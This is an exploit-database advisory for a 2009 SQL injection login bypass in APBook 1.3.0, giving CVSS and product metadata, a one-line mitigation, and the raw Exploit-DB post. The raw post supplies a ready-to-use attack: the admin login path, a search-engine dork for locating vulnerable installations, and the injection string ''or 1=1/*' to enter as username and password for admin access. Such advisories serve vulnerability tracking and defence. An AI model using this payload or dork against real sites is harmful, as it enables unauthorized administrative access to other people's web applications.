APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

vendor:

APBook

by:

n3w7u

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: APBook

Affected Version From: 1.3.0

Affected Version To: 1.3.0

Patch Exists: No

Related CWE: N/A

CPE: a:anotherphpbook:apbook:1.3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

An attacker can bypass authentication by entering 'or 1=1/*' as the username and password in the login page of APBook 1.3.0. This will allow the attacker to log in as an admin.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

########################################################################

                APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

########################################################################
#                            AUTHOR: n3w7u
#
## Download: www.clanscripte.net/main.php?content=download&do=dl&dlid=81
#
## Dorks:                 inurl:apbook/index.php
#  or
#         AnotherPHPBook (APB) v.1.3.0 Â© 2001 by Stephan Baumeister (zap)
#########################################################################
#
## Exploit:
# 
#  http://[host]/[path]/admin/index.php
#
#    [!]
#           Put as username and password: 'or 1=1/*
#           You will log in as admin
#
#

# milw0rm.com [2009-07-21]